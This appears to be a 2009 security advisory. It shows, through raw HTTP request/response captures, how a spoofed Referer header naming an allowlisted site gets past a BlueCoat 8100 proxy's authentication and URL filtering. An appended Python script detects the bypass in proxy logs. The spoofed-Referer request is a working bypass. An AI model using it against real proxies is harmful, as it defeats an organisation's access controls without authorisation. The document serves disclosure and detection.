Title  : Bypass a BlueCoat Proxy 8100 Series (authentication request AND eventually the 3rd party URL filtering solution)
Date   : 14/08/2009
Author : Antoine Santo

******************************************************************
Test one : Try to browse http://www.fcnantes.com/
Result   : I need an account
******************************************************************

GET http://www.fcnantes.com/ HTTP/1.1
Host: www.fcnantes.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive

-----------------

HTTP/1.1 407 Proxy Authentication Required
Proxy-Authenticate: BASIC realm="ACCES"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Proxy-Connection: close
Set-Cookie: BCSI-CS-XXX0302B32A48XXX=2; Path=/
Connection: close
Content-Length: 733

Authentification needed

******************************************************************
Test two : I just add a spoofed HTTP Referer header set to a whitelisted (local database) site
Result   : W00t !!
******************************************************************

GET http://www.fcnantes.com/ HTTP/1.1
Host: www.fcnantes.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Cookie: BCSI-CS-XXX0302B32A48XXX=2
Referer: http://www.mappy.fr

-----------------

HTTP/1.1 200 OK
Date: Fri, 14 Aug 2009 12:41:44 GMT
Server: Apache/2.2.3 (Debian)
Content-Type: text/html
Transfer-Encoding: chunked
Proxy-Connection: Keep-Alive
Connection: Keep-Alive
Age: 0

133f
fcnantes.com - Site officiel du FC Nantes
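
Detection sketch for the behaviour shown in test two, added here as an example and not part of the original advisory: it scans proxy access logs for requests that were served without an authenticated proxy user, to a host outside the allowlist, where only the Referer host is allowlisted. The five-field log format, the sample lines and the `ALLOWLIST` contents are constructed assumptions (only www.mappy.fr appears on the page); adapt the field parsing to the proxy's real access-log format.

```python
from urllib.parse import urlsplit

# Assumption: hosts present in the proxy's local allowlist database.
ALLOWLIST = {"www.mappy.fr"}

# Constructed access-log sample, one request per line:
#   client_ip  proxy_user  status  url  referer      ("-" means empty)
SAMPLE_LOG = """\
10.0.0.5 - 407 http://www.fcnantes.com/ -
10.0.0.5 - 200 http://www.fcnantes.com/ http://www.mappy.fr
10.0.0.7 alice 200 http://www.fcnantes.com/ http://www.mappy.fr
10.0.0.8 - 200 http://www.mappy.fr/ -
10.0.0.9 - 200 http://www.mappy.fr/img/logo.png http://www.mappy.fr/
"""


def host(url):
    """Lower-cased hostname of a URL, or '' for '-' and unparsable values."""
    if url == "-":
        return ""
    return (urlsplit(url).hostname or "").lower()


def referer_only_allows(log_text, allowlist=ALLOWLIST):
    """Return (client, destination, referer_host) for requests that were
    served with no proxy user, to a destination outside the allowlist,
    while the client-supplied Referer host is on the allowlist."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue  # skip malformed lines
        client, user, status, url, referer = fields
        if (user == "-"
                and status.startswith("2")
                and host(url) not in allowlist
                and host(referer) in allowlist):
            hits.append((client, host(url), host(referer)))
    return hits


if __name__ == "__main__":
    for client, dest, ref in referer_only_allows(SAMPLE_LOG):
        print(f"{client}: unauthenticated access to {dest} "
              f"allowed with Referer {ref}")
```

Referer is a client-supplied header, so a hit here means the authentication exemption was decided on a value the client controls; keying the exemption on the destination host instead removes the condition this check looks for.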